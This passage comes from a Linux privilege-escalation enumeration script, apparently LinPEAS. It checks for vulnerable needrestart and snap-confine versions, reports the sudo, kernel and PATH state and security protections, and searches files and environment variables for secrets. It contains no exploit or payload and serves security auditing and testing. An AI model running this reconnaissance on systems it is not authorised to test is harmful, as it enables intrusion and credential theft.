doas_package_full_version="$(printf "%s" "$doas_package_line" | cut -d'|' -f2)" 3886 doas_package_homepage="$(printf "%s" "$doas_package_line" | cut -d'|' -f3-)" 3887 fi 3888 elif command -v apk >/dev/null 2>&1; then 3889 for doas_candidate in opendoas doas; do 3890 doas_candidate_version="$(apk info -e -v "$doas_candidate" 2>/dev/null | head -n 1)" 3891 if [ -n "$doas_candidate_version" ]; then 3892 doas_package_manager="apk" 3893 doas_package_name="$doas_candidate" 3894 doas_package_full_version="${doas_candidate_version#${doas_candidate}-}" 3895 doas_package_homepage="$(apk info -a "$doas_candidate" 2>/dev/null | sed -n 's/^webpage[[:space:]]*:[[:space:]]*//p' | head -n 1)" 3896 break 3897 fi 3898 done 3899 elif command -v pacman >/dev/null 2>&1; then 3900 doas_package_line="$(pacman -Qo "$1" 2>/dev/null | head -n 1)" 3901 doas_package_name="$(printf "%s\n" "$doas_package_line" | sed -nE 's/.* is owned by ([^ ]+) .*/\1/p')" 3902 doas_package_full_version="$(printf "%s\n" "$doas_package_line" | sed -nE 's/.* is owned by [^ ]+ ([^ ]+).*/\1/p')" 3903 if [ -n "$doas_package_name" ]; then 3904 doas_package_manager="pacman" 3905 doas_package_homepage="$(pacman -Qi "$doas_package_name" 2>/dev/null | sed -n 's/^URL[[:space:]]*:[[:space:]]*//p' | head -n 1)" 3906 fi 3907 elif command -v pkg >/dev/null 2>&1; then 3908 doas_package_name="$(pkg which -q "$1" 2>/dev/null | head -n 1)" 3909 if [ -n "$doas_package_name" ]; then 3910 doas_package_manager="pkg" 3911 doas_package_line="$(pkg query '%n|%v|%o|%w' "$doas_package_name" 2>/dev/null | head -n 1)" 3912 doas_package_name="$(printf "%s" "$doas_package_line" | cut -d'|' -f1)" 3913 doas_package_full_version="$(printf "%s" "$doas_package_line" | cut -d'|' -f2)" 3914 doas_package_source="$(printf "%s" "$doas_package_line" | cut -d'|' -f3)" 3915 doas_package_homepage="$(printf "%s" "$doas_package_line" | cut -d'|' -f4-)" 3916 fi 3917 fi 3918 doas_homepage_lower="$(printf "%s" "$doas_package_homepage" | tr '[:upper:]' '[:lower:]')" 3919 case "$doas_homepage_lower:$doas_package_source:$doas_package_name" in 3920 *duncaen/opendoas*|*:opendoas:*|*:*:opendoas) doas_package_implementation="opendoas" ;; 3921 *slicer69/doas*) doas_package_implementation="slicer69" ;; 3922 esac 3923 if [ "$(uname -s 2>/dev/null)" = "OpenBSD" ]; then 3924 doas_package_implementation="openbsd" 3925 fi 3926 } 3927 doas_config_syntax_valid() { 3928 if [ -n "${TIMEOUT:-}" ]; then 3929 "$TIMEOUT" 5 "$1" -C "$2" >/dev/null 2>&1 3930 else 3931 "$1" -C "$2" >/dev/null 2>&1 3932 fi 3933 } 3934 doas_check_command() { 3935 if [ -n "${TIMEOUT:-}" ]; then 3936 "$TIMEOUT" 5 "$1" -C "$2" "$3" 2>/dev/null 3937 else 3938 "$1" -C "$2" "$3" 2>/dev/null 3939 fi 3940 } 3941 3942 nr48990_extract_upstream_version() { 3943 printf '%s' "$1" | sed -E 's/^[0-9]+://; s/^[^0-9]*//; s/[^0-9.].*$//' 3944 } 3945 nr48990_version_lt() { 3946 [ -n "$1" ] && [ -n "$2" ] || return 1 3947 awk -v nr48990_a="$1" -v nr48990_b="$2" 'BEGIN { 3948 nr48990_na = split(nr48990_a, nr48990_av, ".") 3949 nr48990_nb = split(nr48990_b, nr48990_bv, ".") 3950 nr48990_n = nr48990_na > nr48990_nb ? nr48990_na : nr48990_nb 3951 for (nr48990_i = 1; nr48990_i <= nr48990_n; nr48990_i++) { 3952 nr48990_ai = nr48990_av[nr48990_i] + 0 3953 nr48990_bi = nr48990_bv[nr48990_i] + 0 3954 if (nr48990_ai < nr48990_bi) exit 0 3955 if (nr48990_ai > nr48990_bi) exit 1 3956 } 3957 exit 1 3958 }' 3959 } 3960 nr48990_fixed_dpkg_version() { 3961 # Vendor backports from Ubuntu CVE-2024-48990 and Debian DSA-5815-1 / 3962 # DLA-3957-1; comparing only the upstream 3.8 version would misclassify them. 3963 case "$1:$2" in 3964 debian:bullseye|raspbian:bullseye) echo "3.5-4+deb11u4" ;; 3965 debian:bookworm|raspbian:bookworm) echo "3.6-4+deb12u2" ;; 3966 debian:trixie|debian:forky|debian:sid) echo "3.7-3.1" ;; 3967 ubuntu:xenial) echo "2.6-1ubuntu0.1~esm1" ;; 3968 ubuntu:bionic) echo "3.1-1ubuntu0.1+esm1" ;; 3969 ubuntu:focal) echo "3.4-6ubuntu0.1+esm1" ;; 3970 ubuntu:jammy) echo "3.5-5ubuntu2.2" ;; 3971 ubuntu:noble) echo "3.6-7ubuntu4.3" ;; 3972 ubuntu:oracular) echo "3.6-8ubuntu4.2" ;; 3973 ubuntu:plucky) echo "3.6-8ubuntu6" ;; 3974 esac 3975 } 3976 nr48990_effective_interpscan() { 3977 nr48990_config="1" 3978 for nr48990_config_file in "$1"etc/needrestart/needrestart.conf "$1"etc/needrestart/conf.d/*.conf; do 3979 [ -r "$nr48990_config_file" ] || continue 3980 nr48990_config_file_value="$(awk ' 3981 /^[[:space:]]*#/ { next } 3982 { 3983 nr48990_line = $0 3984 sub(/[[:space:]]*#.*/, "", nr48990_line) 3985 if (nr48990_line ~ /^[[:space:]]*[$]nrconf[[:space:]]*\{[[:space:]]*[\047\042]?interpscan[\047\042]?[[:space:]]*\}[[:space:]]*=[[:space:]]*[01][[:space:]]*;/) { 3986 sub(/^.*=[[:space:]]*/, "", nr48990_line) 3987 sub(/[[:space:]]*;.*/, "", nr48990_line) 3988 print nr48990_line 3989 } 3990 } 3991 ' "$nr48990_config_file" 2>/dev/null | tail -n1)" 3992 [ -n "$nr48990_config_file_value" ] && nr48990_config="$nr48990_config_file_value" 3993 done 3994 printf '%s' "$nr48990_config" 3995 } 3996 checkNeedrestartCVE202448990() { 3997 nr48990_root="${ROOT_FOLDER:-/}" 3998 case "$nr48990_root" in 3999 */) ;; 4000 *) nr48990_root="${nr48990_root}/" ;; 4001 esac 4002 nr48990_binary="" 4003 if [ "$nr48990_root" = "/" ]; then 4004 nr48990_binary="$(command -v needrestart 2>/dev/null)" 4005 else 4006 for nr48990_binary_candidate in usr/sbin/needrestart usr/bin/needrestart sbin/needrestart bin/needrestart; do 4007 if [ -f "${nr48990_root}${nr48990_binary_candidate}" ]; then 4008 nr48990_binary="${nr48990_root}${nr48990_binary_candidate}" 4009 break 4010 fi 4011 done 4012 fi 4013 nr48990_full_version="" 4014 nr48990_manager="" 4015 if command -v dpkg-query >/dev/null 2>&1; then 4016 nr48990_dpkg_record="$(dpkg-query --admindir="${nr48990_root}var/lib/dpkg" -W -f='$''{Status}|$''{Version}\n' needrestart 2>/dev/null | head -n1)" 4017 case "$nr48990_dpkg_record" in 4018 "install ok installed|"*) 4019 nr48990_full_version="${nr48990_dpkg_record#*|}" 4020 [ -n "$nr48990_full_version" ] && nr48990_manager="dpkg" 4021 ;; 4022 esac 4023 fi 4024 if [ -z "$nr48990_full_version" ] && command -v rpm >/dev/null 2>&1; then 4025 if nr48990_rpm_record="$(rpm --root "$nr48990_root" -q --qf '%{VERSION}-%{RELEASE}\n' needrestart 2>/dev/null)"; then 4026 nr48990_full_version="$(printf '%s\n' "$nr48990_rpm_record" | head -n1)" 4027 [ -n "$nr48990_full_version" ] && nr48990_manager="rpm" 4028 fi 4029 fi 4030 [ -n "$nr48990_binary" ] || [ -n "$nr48990_full_version" ] || return 0 4031 print_3title "Needrestart interpreter-scanner LPE (CVE-2024-48990)" "T1068" 4032 print_info "https://ubuntu.com/security/CVE-2024-48990" 4033 nr48990_os_release="${nr48990_root}etc/os-release" 4034 nr48990_distro_id="$(sed -nE 's/^ID="?([^" ]+)"?$/\1/p' "$nr48990_os_release" 2>/dev/null | head -n1)" 4035 nr48990_codename="$(sed -nE 's/^VERSION_CODENAME="?([^" ]+)"?$/\1/p' "$nr48990_os_release" 2>/dev/null | head -n1)" 4036 nr48990_ubuntu_codename="$(sed -nE 's/^UBUNTU_CODENAME="?([^" ]+)"?$/\1/p' "$nr48990_os_release" 2>/dev/null | head -n1)" 4037 if [ -n "$nr48990_ubuntu_codename" ]; then 4038 nr48990_distro_id="ubuntu" 4039 nr48990_codename="$nr48990_ubuntu_codename" 4040 fi 4041 nr48990_upstream_version="$(nr48990_extract_upstream_version "$nr48990_full_version")" 4042 nr48990_interpscan="$(nr48990_effective_interpscan "$nr48990_root")" 4043 nr48990_dpkg_fixed="" 4044 nr48990_status="unknown" 4045 if [ "$nr48990_manager" = "dpkg" ] && command -v dpkg >/dev/null 2>&1; then 4046 nr48990_dpkg_fixed="$(nr48990_fixed_dpkg_version "$nr48990_distro_id" "$nr48990_codename")" 4047 if [ -n "$nr48990_dpkg_fixed" ]; then 4048 if dpkg --compare-versions "$nr48990_full_version" lt "$nr48990_dpkg_fixed"; then 4049 nr48990_status="affected" 4050 else 4051 nr48990_status="fixed" 4052 fi 4053 fi 4054 fi 4055 if [ "$nr48990_status" = "unknown" ] && [ -n "$nr48990_upstream_version" ]; then 4056 if nr48990_version_lt "$nr48990_upstream_version" "3.8"; then 4057 nr48990_status="potential" 4058 else 4059 nr48990_status="fixed" 4060 fi 4061 fi 4062 echo "needrestart package: ${nr48990_full_version:-version unknown}${nr48990_manager:+ ($nr48990_manager)}" | sed -${E} "s,.*,${SED_LIGHT_CYAN}," 4063 if [ -n "$nr48990_dpkg_fixed" ]; then 4064 echo "Vendor fixed version for ${nr48990_distro_id:-unknown} ${nr48990_codename:-unknown}: $nr48990_dpkg_fixed" 4065 fi 4066 case "$nr48990_status:$nr48990_interpscan" in 4067 affected:0|potential:0) 4068 echo "Affected needrestart version detected, but the official interpscan=0 mitigation is active; update is still recommended" | sed -${E} "s,.*,${SED_YELLOW}," 4069 ;; 4070 affected:*) 4071 echo "VULNERABLE to CVE-2024-48990: needrestart $nr48990_full_version is below the vendor fixed version and interpreter scanning is enabled" | sed -${E} "s,.*,${SED_RED_YELLOW}," 4072 ;; 4073 potential:*) 4074 echo "Potentially vulnerable to CVE-2024-48990: upstream needrestart $nr48990_upstream_version is before 3.8 and interpreter scanning is enabled; verify distro backports" | sed -${E} "s,.*,${SED_RED_YELLOW}," 4075 ;; 4076 fixed:*) 4077 echo "needrestart $nr48990_full_version is not vulnerable to CVE-2024-48990 according to the known vendor/upstream fixed version" | sed -${E} "s,.*,${SED_GREEN}," 4078 ;; 4079 unknown:0) 4080 echo "needrestart is present; version is unknown, but the interpscan=0 mitigation is active" | sed -${E} "s,.*,${SED_YELLOW}," 4081 ;; 4082 *) 4083 echo "needrestart is present with interpreter scanning enabled, but its version could not be assessed" | sed -${E} "s,.*,${SED_RED_YELLOW}," 4084 ;; 4085 esac 4086 echo "Effective interpreter scanning: $nr48990_interpscan (0=disabled mitigation, 1=enabled/default)" 4087 echo "" 4088 } 4089 4090 warn_exec(){ 4091 $* 2>/dev/null || echo_not_found $1 4092 } 4093 4094 sc8933_extract_upstream_version() { 4095 printf '%s' "$1" | sed -E 's/^[0-9]+://; s/^[^0-9]*//; s/[^0-9.].*$//' 4096 } 4097 sc8933_version_ge() { 4098 [ -n "$1" ] && [ -n "$2" ] || return 1 4099 if command -v dpkg >/dev/null 2>&1; then 4100 dpkg --compare-versions "$1" ge "$2" 4101 else 4102 [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V 2>/dev/null | tail -n1)" = "$1" ] 4103 fi 4104 } 4105 sc8933_version_lt() { 4106 [ -n "$1" ] && [ -n "$2" ] || return 1 4107 if command -v dpkg >/dev/null 2>&1; then 4108 dpkg --compare-versions "$1" lt "$2" 4109 else 4110 [ "$1" != "$2" ] && [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V 2>/dev/null | head -n1)" = "$1" ] 4111 fi 4112 } 4113 sc8933_version_is_vulnerable() { 4114 sc8933_version="$1" 4115 sc8933_kind="$2" 4116 sc8933_os_release="$3" 4117 sc8933_upstream="$(sc8933_extract_upstream_version "$sc8933_version")" 4118 # The upstream affected range is >= 2.75.0 and < 2.76.1. Ubuntu fixed 4119 # 2.76 with release-specific backports, so compare the complete dpkg version. 4120 sc8933_version_ge "$sc8933_upstream" "2.75" || return 1 4121 if [ "$sc8933_kind" = "deb" ]; then 4122 sc8933_fixed="" 4123 case "$sc8933_os_release" in 4124 22.04) sc8933_fixed="2.76+ubuntu22.04.1" ;; 4125 24.04) sc8933_fixed="2.76+ubuntu24.04.1" ;; 4126 26.04) sc8933_fixed="2.76+ubuntu26.04.3" ;; 4127 esac 4128 if [ -n "$sc8933_fixed" ]; then 4129 sc8933_version_lt "$sc8933_version" "$sc8933_fixed" 4130 return 4131 fi 4132 fi 4133 sc8933_version_lt "$sc8933_upstream" "2.76.1" 4134 } 4135 checkSnapConfineCVE20268933() { 4136 command -v getcap >/dev/null 2>&1 || return 4137 sc8933_root="${ROOT_FOLDER:-/}" 4138 case "$sc8933_root" in 4139 */) ;; 4140 *) sc8933_root="${sc8933_root}/" ;; 4141 esac 4142 sc8933_os_id="$(sed -nE 's/^ID="?([^" ]+)"?$/\1/p' "${sc8933_root}etc/os-release" 2>/dev/null | head -n1)" 4143 sc8933_os_release="$(sed -nE 's/^VERSION_ID="?([^" ]+)"?$/\1/p' "${sc8933_root}etc/os-release" 2>/dev/null | head -n1)" 4144 sc8933_reported="" 4145 for sc8933_path in \ 4146 "${sc8933_root}usr/lib/snapd/snap-confine" \ 4147 "${sc8933_root}snap/snapd/current/usr/lib/snapd/snap-confine"; do 4148 [ -f "$sc8933_path" ] || continue 4149 [ -u "$sc8933_path" ] && continue 4150 sc8933_caps="$(getcap "$sc8933_path" 2>/dev/null)" 4151 printf '%s' "$sc8933_caps" | grep -q 'cap_sys_admin' || continue 4152 if [ -z "$sc8933_reported" ]; then 4153 print_3title "Set-capabilities snap-confine (CVE-2026-8933)" "T1068" 4154 print_info "https://ubuntu.com/security/CVE-2026-8933" 4155 sc8933_reported="1" 4156 fi 4157 sc8933_kind="snap" 4158 sc8933_yaml="${sc8933_root}snap/snapd/current/meta/snap.yaml" 4159 sc8933_version="" 4160 case "$sc8933_path" in 4161 */usr/lib/snapd/snap-confine) 4162 if [ "$sc8933_path" = "${sc8933_root}usr/lib/snapd/snap-confine" ]; then 4163 sc8933_kind="deb" 4164 if command -v dpkg-query >/dev/null 2>&1; then 4165 sc8933_version="$(dpkg-query --admindir="${sc8933_root}var/lib/dpkg" -W -f='$''{Version}\n' snapd 2>/dev/null | head -n1)" 4166 fi 4167 elif [ -r "$sc8933_yaml" ]; then 4168 sc8933_version="$(sed -nE "s/^version:[[:space:]]*['\"]?([^'\"[:space:]]+).*/\1/p" "$sc8933_yaml" 2>/dev/null | head -n1)" 4169 fi 4170 ;; 4171 esac 4172 echo "$sc8933_caps" | sed -${E} "s,.*,${SED_LIGHT_CYAN}," 4173 if [ -z "$sc8933_version" ]; then 4174 echo "Potential CVE-2026-8933 exposure: privileged snap-confine uses file capabilities; version could not be determined" | sed -${E} "s,.*,${SED_RED_YELLOW}," 4175 elif [ "$sc8933_os_id" != "ubuntu" ] && [ "$sc8933_kind" = "deb" ]; then 4176 if sc8933_version_is_vulnerable "$sc8933_version" "$sc8933_kind" "$sc8933_os_release"; then 4177 echo "snap-confine version $sc8933_version uses file capabilities and is in the upstream CVE-2026-8933 range; verify distro backports" | sed -${E} "s,.*,${SED_RED_YELLOW}," 4178 else 4179 echo "snap-confine version $sc8933_version is not in the known CVE-2026-8933 vulnerable range" | sed -${E} "s,.*,${SED_GREEN}," 4180 fi 4181 elif sc8933_version_is_vulnerable "$sc8933_version" "$sc8933_kind" "$sc8933_os_release"; then 4182 echo "Vulnerable to CVE-2026-8933: set-capabilities snap-confine version $sc8933_version permits local privilege escalation to root" | sed -${E} "s,.*,${SED_RED_YELLOW}," 4183 else 4184 echo "snap-confine version $sc8933_version is not in the known CVE-2026-8933 vulnerable range" | sed -${E} "s,.*,${SED_GREEN}," 4185 fi 4186 done 4187 if [ -n "$sc8933_reported" ]; then 4188 echo "" 4189 fi 4190 } 4191 4192 check_critial_root_path(){ 4193 folder_path="$1" 4194 if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi 4195 if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi 4196 if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi 4197 } 4198 4199 macosNotSigned(){ 4200 for f in $1/*; do 4201 if codesign -vv -d \"$f\" 2>&1 | grep -q 'not signed'; then 4202 echo "$f isn't signed" | sed -${E} "s,.*,${SED_RED}," 4203 fi 4204 done 4205 } 4206 4207 search_for_regex(){ 4208 title=$1 4209 regex=$2 4210 caseSensitive=$3 4211 if [ "$caseSensitive" ]; then 4212 i="i" 4213 else 4214 i="" 4215 fi 4216 print_3title_no_nl "Searching $title..." 4217 if [ "$SEARCH_IN_FOLDER" ]; then 4218 timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4219 else 4220 # Search in home direcoties (usually the slowest) 4221 timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4222 # Search in etc 4223 timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4224 # Search in opt 4225 timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4226 # Search in possible web folders (usually only 1 will exist) 4227 timeout 120 find /var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4228 # Search in logs 4229 timeout 120 find /var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4230 # Search in backups 4231 timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4232 # Search in others folders (usually only /srv or /Applications will exist) 4233 timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & 4234 fi 4235 wait 4236 printf "\033[2K\r" 4237 } 4238 4239 4240 4241 4242 # Checks 4243 4244 4245 if echo $CHECKS | grep -q system_information; then 4246 if check_mitre_filter "T1082,T1552.007,T1518.001,T1547.006,T1068,T1548.003,T1574.007,T1120"; then 4247 print_title "System Information" 4248 linpeas_start_host_checker_lookup 4249 if check_mitre_filter "T1082"; then 4250 print_2title "Operative system" "T1082" 4251 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits" 4252 (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," 4253 warn_exec lsb_release -a 2>/dev/null 4254 if [ "$MACPEAS" ]; then 4255 warn_exec system_profiler SPSoftwareDataType 4256 fi 4257 echo "" 4258 4259 fi 4260 4261 if check_mitre_filter "T1548.003,T1068"; then 4262 print_2title "Sudo version" "T1548.003,T1068" 4263 if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then 4264 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version" 4265 sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," 4266 else echo_not_found "sudo" 4267 fi 4268 echo "" 4269 4270 fi 4271 4272 if check_mitre_filter "T1548.003,T1068"; then 4273 if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then 4274 print_2title "USBCreator" "T1548.003,T1068" 4275 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.html" 4276 pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") 4277 if [ -z "$pc_version" ]; then 4278 pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) 4279 fi 4280 if [ -n "$pc_version" ]; then 4281 pc_length=${#pc_version} 4282 pc_major=$(echo "$pc_version" | cut -d. -f1) 4283 pc_minor=$(echo "$pc_version" | cut -d. -f2) 4284 if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then 4285 echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," 4286 fi 4287 fi 4288 fi 4289 echo "" 4290 4291 fi 4292 4293 if check_mitre_filter "T1574.007"; then 4294 print_2title "PATH" "T1574.007" 4295 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses" 4296 if ! [ "$IAMROOT" ]; then 4297 echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" 4298 fi 4299 if [ "$DEBUG" ]; then 4300 echo "New path exported: $PATH" 4301 fi 4302 echo "" 4303 4304 fi 4305 4306 if check_mitre_filter "T1082"; then 4307 print_2title "Date & uptime" "T1082" 4308 warn_exec date 2>/dev/null 4309 warn_exec uptime 2>/dev/null 4310 echo "" 4311 4312 fi 4313 4314 if check_mitre_filter "T1082"; then 4315 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then 4316 print_2title "CPU info" "T1082" 4317 warn_exec lscpu 2>/dev/null 4318 echo "" 4319 fi 4320 4321 fi 4322 4323 if check_mitre_filter "T1082,T1120"; then 4324 if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then 4325 print_2title "Unmounted file-system?" "T1082,T1120" 4326 print_info "Check if you can mount umounted devices" 4327 grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" 4328 echo "" 4329 fi 4330 4331 fi 4332 4333 if check_mitre_filter "T1082"; then 4334 if [ -d "/dev" ] || [ "$DEBUG" ] ; then 4335 print_2title "Any sd*/disk* disk in /dev? (limit 20)" "T1082" 4336 ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 4337 echo "" 4338 fi 4339 if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then 4340 print_2title "Mounted SMB Shares" "T1082" 4341 warn_exec smbutil statshares -a 4342 echo "" 4343 fi 4344 4345 fi 4346 4347 if check_mitre_filter "T1082"; then 4348 if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then 4349 print_2title "Mounted disks information" "T1082" 4350 warn_exec diskutil list 4351 echo "" 4352 fi 4353 if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then 4354 print_2title "System stats" "T1082" 4355 (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" 4356 warn_exec free 2>/dev/null 4357 echo "" 4358 print_2title "Inode usage" "T1082" 4359 warn_exec df -i 2>/dev/null 4360 echo "" 4361 fi 4362 4363 fi 4364 4365 if check_mitre_filter "T1082,T1552.007"; then 4366 print_2title "Environment" "T1082,T1552.007" 4367 print_info "Any private information inside environment variables?" 4368 (env || printenv || set) 2>/dev/null | grep -Eiv "$NoEnvVars" | sed -${E} "s,$EnvVarsRed,${SED_RED},g" || echo_not_found "env || set" 4369 echo "" 4370 4371 fi 4372 4373 if check_mitre_filter "T1082"; then 4374 if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then 4375 print_2title "Searching Signature verification failed in dmesg" "T1082" 4376 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed" 4377 (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" 4378 echo "" 4379 fi 4380 4381 fi 4382 4383 if check_mitre_filter "T1082"; then 4384 if [ "$MACPEAS" ]; then 4385 print_2title "Kernel Extensions not belonging to apple" "T1082" 4386 kextstat 2>/dev/null | grep -Ev " com.apple." 4387 echo "" 4388 print_2title "Unsigned Kernel Extensions" "T1082" 4389 macosNotSigned /Library/Extensions 4390 macosNotSigned /System/Library/Extensions 4391 echo "" 4392 fi 4393 if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then 4394 print_2title "Brew Doctor Suggestions" "T1082" 4395 brew doctor 4396 echo "" 4397 fi 4398 4399 fi 4400 4401 if check_mitre_filter "T1518.001"; then 4402 print_sysctl_eq_zero() { 4403 local label="$1" 4404 local sysctl_path="$2" 4405 local sysctl_var="$3" 4406 local zero_color="$4" 4407 local nonzero_color="$5" 4408 local sysctl_value 4409 print_list "$label" "$NC" 4410 sysctl_value=$(cat "$sysctl_path" 2>/dev/null) 4411 eval "$sysctl_var=\$sysctl_value" 4412 if [ -z "$sysctl_value" ]; then 4413 echo_not_found "$sysctl_path" 4414 else 4415 if [ "$sysctl_value" -eq 0 ]; then 4416 echo "0" | sed -${E} "s,0,${zero_color}," 4417 else 4418 echo "$sysctl_value" | sed -${E} "s,.*,${nonzero_color},g" 4419 fi 4420 fi 4421 } 4422 #-- SY) AppArmor 4423 print_2title "Protections" "T1518.001" 4424 print_list "AppArmor enabled? .............. "$NC 4425 if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then 4426 aa-status 2>&1 | sed "s,disabled,${SED_RED}," 4427 elif [ "$(command -v apparmor_status 2>/dev/null || echo -n '')" ]; then 4428 apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," 4429 elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then 4430 ls -d /etc/apparmor* 4431 else 4432 echo_not_found "AppArmor" 4433 fi 4434 #-- SY) AppArmor2 4435 print_list "AppArmor profile? .............. "$NC 4436 (cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN}," 4437 #-- SY) LinuxONE 4438 print_list "is linuxONE? ................... "$NC 4439 ( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x") 4440 #-- SY) grsecurity 4441 print_list "grsecurity present? ............ "$NC 4442 ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") 4443 #-- SY) PaX 4444 print_list "PaX bins present? .............. "$NC 4445 (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") 4446 #-- SY) Execshield 4447 print_list "Execshield enabled? ............ "$NC 4448 (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," 4449 #-- SY) SElinux 4450 print_list "SELinux enabled? ............... "$NC 4451 (sestatus 2>/dev/null || echo_not_found "sestatus") 